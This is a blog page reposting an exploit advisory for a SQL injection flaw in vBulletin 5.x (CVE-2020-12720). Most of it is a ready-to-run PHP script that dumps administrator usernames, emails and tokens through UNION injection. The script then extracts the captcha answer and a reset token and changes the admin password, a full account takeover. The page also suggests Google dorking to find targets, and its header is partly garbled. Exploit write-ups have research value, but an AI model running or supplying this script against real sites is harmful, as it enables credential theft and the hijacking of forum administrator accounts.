Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

vBulletin 5.6.1 SQL Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 93
=============================================================================================================================================
| # Title : vbulletin 5.6.1 =============================================================================================================================================
| # Title : vbulletin 5.6.1 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://vbulletin.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] vulnerability found in vBulletin 5.x.x to dump the user table information or to dump all of the vBulletin tables (based on the selected options)

[+] save code as poc.php .

[+] Line 5 : set your target.

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

$sADMINPASS = '12345678';
$sCMD = 'id';
$sURL = 'https://[target]/forums/';
$sUSERID = '1';
$sNEWPASS = '87654321';
$iTimeout = 5;

// Function to send a POST request
function getData($sUrl, $lData) {
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($lData),
'timeout' => 5,
],
];

$context = stream_context_create($options);
$result = @file_get_contents($sUrl, false, $context);
if ($result === FALSE) {
die('----- ERROR, site down?');
}

return $result;
}

// Function to generate random strings
function randomString($length = 8) {
return substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz', ceil($length / 26))), 1, $length);
}

// Function to verify the vulnerability
function verifyBug($sURL, $sUserid = '1') {
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'];
$sResponse = getData($sURL . $sPath, $lData);
if (strpos($sResponse, 'cve-2020-12720') === false) {
echo '[!] Warning: not vulnerable' . PHP_EOL;
return false;
} else {
echo '[+] SQLi Success!' . PHP_EOL;
return true;
}
}

// Function to takeover account
function takeoverAccount($sURL, $sNEWPASS) {
$sPath = 'ajax/api/content_infraction/getIndexableContent';

// Get Table Prefixes
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 FROM information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sPrefix = isset($matches[1]) ? str_replace(['"', '}', 'language'], '', $matches[1]) : '';

// Get usergroup ID for "Administrators"
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'usergroup WHERE title=\'Administrators\';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sGroupID = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';

// Get admin data
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'user WHERE usergroupid=' . $sGroupID . ';--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
list($sUsername, $sUserid, $sUsermail, $sUserTokenOrg) = explode('|', isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '');

// Create Human Verify Captcha
$sPath = 'ajax/api/hv/generateToken?';
$lData = ['securitytoken' => 'guest'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/hash.*?:(.*?)}"/', $sResponse, $matches);
$sHash = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';

// Get the captcha answer from DB
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'humanverify LIMIT 0,1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$iAnswers = isset($matches[1]) ? (int) str_replace(['"', '}'], '', $matches[1]) : 1;

$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'humanverify LIMIT ' . ($iAnswers - 1) . ',1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sAnswer = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';

// Request password reset
$sPath = 'auth/lostpw';
$lData = [
'email' => $sUsermail,
'humanverify[input]' => $sAnswer,
'humanverify[hash]' => $sHash,
'securitytoken' => 'guest'
];
$sResponse = getData($sURL . $sPath, $lData);

// Get activation token
$sPath = 'ajax/api/content_infraction/getIndexableContent';
$lData = ['nodeId[nodeid]' => '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 FROM ' . $sPrefix . 'useractivation WHERE userid=' . $sUserid . ' LIMIT 0,1--'];
$sResponse = getData($sURL . $sPath, $lData);
preg_match('/rawtext.*?:(.*?)}"/', $sResponse, $matches);
$sToken = isset($matches[1]) ? str_replace(['"', '}'], '', $matches[1]) : '';

// Reset password
$sPath = 'auth/reset-password';
$lData = [
'userid' => $sUserid,
'activationid' => $sToken,
'new-password' => $sNEWPASS,
'new-password-confirm' => $sNEWPASS,
'securitytoken' => 'guest'
];
$sResponse = getData($sURL . $sPath, $lData);
if (strpos($sResponse, 'Logging in') === false) {
echo '[!] Failed to take over the account!' . PHP_EOL;
} else {
echo '[+] Account takeover success!' . PHP_EOL;
}
}

// Main execution
if (verifyBug($sURL)) {
takeoverAccount($sURL, $sNEWPASS);
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share